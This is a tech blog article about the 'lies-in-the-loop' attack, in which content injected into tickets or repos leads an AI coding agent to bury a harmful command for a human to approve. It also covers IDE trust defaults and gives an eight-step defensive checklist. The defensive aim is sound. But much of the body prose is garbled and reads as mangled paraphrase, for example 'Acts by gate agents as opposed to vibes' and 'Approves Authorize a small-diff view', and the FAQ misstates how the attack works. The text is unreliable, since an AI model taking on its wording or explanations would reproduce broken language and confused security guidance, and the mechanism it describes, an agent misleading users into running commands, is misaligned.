• About Us
  • Contact Us
  • Terms & Conditions
  • Privacy Policy
Technology Hive
  • Home
  • Technology
  • Artificial Intelligence (AI)
  • Cyber Security
  • Machine Learning
  • More
    • Deep Learning
    • AI in Healthcare
    • AI Regulations & Policies
    • Business
    • Cloud Computing
    • Ethics & Society
No Result
View All Result
  • Home
  • Technology
  • Artificial Intelligence (AI)
  • Cyber Security
  • Machine Learning
  • More
    • Deep Learning
    • AI in Healthcare
    • AI Regulations & Policies
    • Business
    • Cloud Computing
    • Ethics & Society
No Result
View All Result
Technology Hive
No Result
View All Result
Home Technology

Stop AI Agents from Running Code

Linda Torries – Tech Writer & Digital Trends Analyst by Linda Torries – Tech Writer & Digital Trends Analyst
September 18, 2025
in Technology
0
Stop AI Agents from Running Code
0
SHARES
0
VIEWS
Share on FacebookShare on Twitter

Introduction to AI Security

Your AI code assistant will coerce you to execute risky code snippets, and things just will get done the second you open the folder. This is how to continue to stay safe. What would happen if the most perilous line you will ever see today was the "Are you sure?" prompt?

My Story

Some weeks ago, a group of people released a microservice that was small, having passed an artificial intelligence-enabled security check. I stood and watched the notes to construction regarding the building march by in my design office, and I felt that itch again: it did not have any harsh edge, it was pleasant, but it was not helpful. An experiment upon the same flow with a toy repo confirmed the argument — the assistant was induced to beg to be allowed to do something of the backdrop with a long scroll of helpful matter, and the risky bit was quite out of frame.

The same trend was soon rediscovered in another project I was doing last year, where one of the developers’ IDEs would be loaded to accomplish a task file whenever a folder is opened. No malicious magical arts — careless and credibility. That was a fast lesson, but the moral of the story was still the same: the new era of AI does not exalt old security issues; it merely folds them under a more pleasant surface.

Why This Matters

The headline of today is obvious: scientists demonstrated a so-called lies-in-the-loop (LITL) attack that makes an AI coding agent think you are telling the truth, and then it creates a harmful command, of course, you press Enter, and supply-chain danger ensues. At the same time, another thread demonstrates that your IDE may be a part of the problem. According to Hacker News, Cursor, a fork of VS Code, powered by AI, comes with Workspace Trust switched off; any repository containing a .vscode/tasks.json can be run as code by default when you open a folder; it becomes code running under your account.

And, as you may be thinking, part yes, this is just a prompt injection, in other words. The 2025 LLM Top 10 of OWASP begins with LLM01 Prompt Injection and LLM02 Insecure Output Handling. The ancient rule is true: mistrust input should never be the force to take a sensitive action without extreme measures. But this is the twist — man is still in the loop, and it is the loop the lie falls in.

Your Fix in Steps

The following is a short route that can be completed by teams during this week. It seems to be an essay as the fix is not a characteristic but a habit.

  1. Turn trust back on (and pin it). Enabling the Workspace Trust in any AI-enhanced IDE or similar, and setting up the option of Open in Restricted Mode in the untrusted folders. Better still: audit repos exclusively. Hint: .vscode/tasks.json looks like executable code, and it is.
  2. Acts by gate agents as opposed to vibes. Human-in-the-loop (HITL) is not in control when the human is not able to see the risky delta. Make the agent provide a short and fixed Action Plan containing the precise command and target in a monospace box; refuse to accept approvals when the box exceeds a fixed size. This reduces the above-the-fold trick of burying it.
  3. Split responsibilities: render vs. run. Have the agent in a render sandbox (plan, diff, test outline) and execute it with a different (strict) allow-lists. It is the proposing of the agent; it is the enforcing by the runner. OWASP translates this to the following LLM02 / LLM05: constrain outputs and secure the supply chain.
  4. Label your models and artifacts. Drawing the author/model by name only out of the public hubs is a bad idea. Pin to unchanging SHAs and reflect to your registry. Palo Alto presents the Model Namespace Reuse to demonstrate the reason why names cannot be trusted.
  5. Approves Authorize a small-diff view. Prior to running the run command, only the least amount of diff or a single command should be displayed. No story, no scroll back, no emojis, no more, no less. In case the agent is not able to display a diff, it is not runnable. Tip: Brief reviewing periods reduce decision fatigue and success in social engineering.
  6. Instrument the splash zone. Generate a low-privileged, disposable agent environment with special API keys, project secrets, and kill switches. Record all outgoing calls and file touches. Should one of them go wrong, you nuke a sandbox- not your laptop.
  7. Make use of adversarial exercises. Test Purple-Team Purple-Team tests conceal injected instructions in tickets, READMEs, and issues, just like in the LITL study, and measure time-to-notice and time-to-kill. Slow and cautious approval habits should be rewarded. This much would have cost us thousands if we had not hit it; it was the first thing discovered by the drill.
  8. Address: Are you sure it’s more like an interface, rather than a checkbox? Create your own approval prompt: high-contrast, single-screen fixed font. The most effective prompt is more of a surgical consent form and not a pep talk. Which would you do away with first, logs or access?

Quick Myths

“Humans are the safety net.” They are — until the fall is disguised by the friendly text on the net with a blanket. “Sandboxing is enough.” Only in the case of the sandbox containing the secrets, the tokens, and logs to respond to you, if you have the sandbox. “Trusted sources imply safe models.” Names are Hijackable; Pin by Hash & Mirror.

Checklist

Before you merge today, scan this:

  1. Workspace Trust on
  2. Agent “Action Plan” diff renders cleanly
  3. Commands are short and pinned
  4. Model pulls by SHA
  5. Throwaway keys only
  6. Logs centralized and reviewed.

What to Do This Week

Make Tuesday your day of Artificial Intelligence security. In IDs, do trust modes and append the one supplementary single of the Panel, do it like a top five of external mirror with hashes. Then do a 30-minute deceptive exercise — Hide one of the instructions in an issue and see if your team gets it? If approvals feel rushed (slow down the loop on purpose).

Further Reading

  1. Dark Reading (Sep 15, 2025) — report on “Lies-in-the-Loop” beating AI.
  2. Checkmarx (Sep 15, 2025) — primary research — Proof of Concept on LITL with HITL bypass patterns.
  3. The Hacker News (Sep 12, 2025) — Cursor IDE default trust setting allows executing tasks silently on folder opening.
  4. OWASP GenAI Top 10 (2025) — LLM01/LLM02 Grounding for prompt injection/out handling controls.

Conclusion

AI security is a growing concern, and it’s essential to take steps to protect yourself and your team from potential threats. By following the steps outlined in this article, you can help prevent AI-related security breaches and ensure a safer coding environment.

FAQs

Q: What is a lies-in-the-loop (LITL) attack?
A: A LITL attack is a type of attack that makes an AI coding agent think you are telling the truth, and then it creates a harmful command.
Q: How can I prevent LITL attacks?
A: You can prevent LITL attacks by enabling Workspace Trust, using a render sandbox, and splitting responsibilities between the agent and the runner.
Q: What is the importance of labeling models and artifacts?
A: Labeling models and artifacts is crucial to prevent hijacking and ensure the integrity of your code.
Q: How can I instrument the splash zone?
A: You can instrument the splash zone by generating a low-privileged, disposable agent environment with special API keys, project secrets, and kill switches.

Previous Post

China Blocks Nvidia AI Chip Sales

Next Post

Huawei Unveils Ascend Chips For World’s Most Powerful Cluster

Linda Torries – Tech Writer & Digital Trends Analyst

Linda Torries – Tech Writer & Digital Trends Analyst

Linda Torries is a skilled technology writer with a passion for exploring the latest innovations in the digital world. With years of experience in tech journalism, she has written insightful articles on topics such as artificial intelligence, cybersecurity, software development, and consumer electronics. Her writing style is clear, engaging, and informative, making complex tech concepts accessible to a wide audience. Linda stays ahead of industry trends, providing readers with up-to-date analysis and expert opinions on emerging technologies. When she's not writing, she enjoys testing new gadgets, reviewing apps, and sharing practical tech tips to help users navigate the fast-paced digital landscape.

Related Posts

Senators Expose Data Centers’ Shady Energy Billing Practices
Technology

Senators Expose Data Centers’ Shady Energy Billing Practices

by Linda Torries – Tech Writer & Digital Trends Analyst
December 16, 2025
BNP Paribas Launches AI-Powered Investment Banking Tool
Technology

BNP Paribas Launches AI-Powered Investment Banking Tool

by Linda Torries – Tech Writer & Digital Trends Analyst
December 16, 2025
AI Literacy Matters
Technology

AI Literacy Matters

by Linda Torries – Tech Writer & Digital Trends Analyst
December 16, 2025
Murder-Suicide Case Exposes OpenAI’s Data Hiding Policy
Technology

Murder-Suicide Case Exposes OpenAI’s Data Hiding Policy

by Linda Torries – Tech Writer & Digital Trends Analyst
December 16, 2025
Merriam-Webster’s word of the year delivers a dismissive verdict on junk AI content
Technology

Merriam-Webster’s word of the year delivers a dismissive verdict on junk AI content

by Linda Torries – Tech Writer & Digital Trends Analyst
December 15, 2025
Next Post
Huawei Unveils Ascend Chips For World’s Most Powerful Cluster

Huawei Unveils Ascend Chips For World's Most Powerful Cluster

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Latest Articles

Comparing QWQ-32B and DeepSeek-R1 Performance

Comparing QWQ-32B and DeepSeek-R1 Performance

March 11, 2025
AI Model Monitors Prison Calls for Planned Crimes

AI Model Monitors Prison Calls for Planned Crimes

December 1, 2025
Samsung’s Compact AI Outperforms Large Reasoning LLMs

Samsung’s Compact AI Outperforms Large Reasoning LLMs

October 8, 2025

Browse by Category

  • AI in Healthcare
  • AI Regulations & Policies
  • Artificial Intelligence (AI)
  • Business
  • Cloud Computing
  • Cyber Security
  • Deep Learning
  • Ethics & Society
  • Machine Learning
  • Technology
Technology Hive

Welcome to Technology Hive, your go-to source for the latest insights, trends, and innovations in technology and artificial intelligence. We are a dynamic digital magazine dedicated to exploring the ever-evolving landscape of AI, emerging technologies, and their impact on industries and everyday life.

Categories

  • AI in Healthcare
  • AI Regulations & Policies
  • Artificial Intelligence (AI)
  • Business
  • Cloud Computing
  • Cyber Security
  • Deep Learning
  • Ethics & Society
  • Machine Learning
  • Technology

Recent Posts

  • Senators Expose Data Centers’ Shady Energy Billing Practices
  • Fostering Trust in AI Systems
  • The Impact of AI Search Tools on SEO Specialists
  • Resetting Expectations for AI
  • AI Deployment in Mining Businesses

Our Newsletter

Subscribe Us To Receive Our Latest News Directly In Your Inbox!

We don’t spam! Read our privacy policy for more info.

Check your inbox or spam folder to confirm your subscription.

© Copyright 2025. All Right Reserved By Technology Hive.

No Result
View All Result
  • Home
  • Technology
  • Artificial Intelligence (AI)
  • Cyber Security
  • Machine Learning
  • AI in Healthcare
  • AI Regulations & Policies
  • Business
  • Cloud Computing
  • Ethics & Society
  • Deep Learning

© Copyright 2025. All Right Reserved By Technology Hive.

Are you sure want to unlock this post?
Unlock left : 0
Are you sure want to cancel subscription?